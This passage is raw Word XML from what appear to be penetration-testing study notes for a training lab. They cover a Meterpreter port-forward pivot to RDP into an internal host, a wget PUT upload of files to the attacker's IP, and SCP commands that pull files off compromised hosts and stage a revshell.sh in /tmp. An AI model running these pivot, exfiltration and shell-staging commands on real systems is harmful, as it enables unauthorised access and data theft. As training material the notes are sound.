          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd add -L 127.0.0.1 -l 3389 -p 3389 -r 172.16.5.200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BBE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's test this by connecting to 127.0.0.1:3389 with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the compromised host in the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="518" name="image500.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image500.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId246"/>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BC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo xfreerdp /v:127.0.0.1 /u:luiza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using this technique, we can gain a remote desktop session on a host we were otherwise not able to reach from our Kali system. Likewise, if the second target machine was connected to an additional network, we could create a chain of pivots to reach further hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mzzf34ypnike" w:id="100"/>
      <w:bookmarkEnd w:id="100"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCP (Secure Copy Protocol) is a really neat way of getting files between two hosts. Mostly, I use it to get files between my local kali and an SSH session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BCA">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload-server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-Scripts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which is a lot faster to set up, but if that doesn't work then use SCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="712"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload-server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="712"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="712"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget --method=PUT --body-file=&lt;file_path&gt; http://192.168.45.232:80/&lt;outfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="712"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this on SSH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD0">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All the scp commands are run from your Kali, never in SSH</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting files from SSH to Local Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="764"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With private key for SSH and port 2222:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="764"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -i id_rsa -P 2222 anita@192.168.216.245:/home/anita/local.txt /home/kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="764"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to specify private key for SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="764"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P 2222</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for custom port to connect to SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="764"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With password for SSH and port 22 (default):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="764"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp bob@192.168.1.50:/home/bob/secret.txt /home/kali/Desktop/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting files from Local Kali to SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With private key for SSH and port 2222:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -i id_rsa -P 2222 /home/kali/pass.txt anita@192.168.216.245:/home/anita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to specify private key for SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P 2222</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for custom port to connect to SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With password for SSH and port 22 (default):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp /home/kali/Desktop/revshell.sh bob@192.168.1.50:/tmp/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_blo8wd2tf9ht" w:id="101"/>
      <w:bookmarkEnd w:id="101"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEB">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY IMPORTANT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You need a trailing line at the end of private SSH key in order for it to work. This is important for when you copy and paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In other words, you need a "0a" at the last line, which is equivalent to \n which is equivalent to just putting a new trailing line at the end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I had to fix this to get it to work in the MedTech Challenge Lab to get into the last .14 machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I kept on getting this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Load key "id_rsa": error in libcrypto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used sublime text btw, in case that matters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
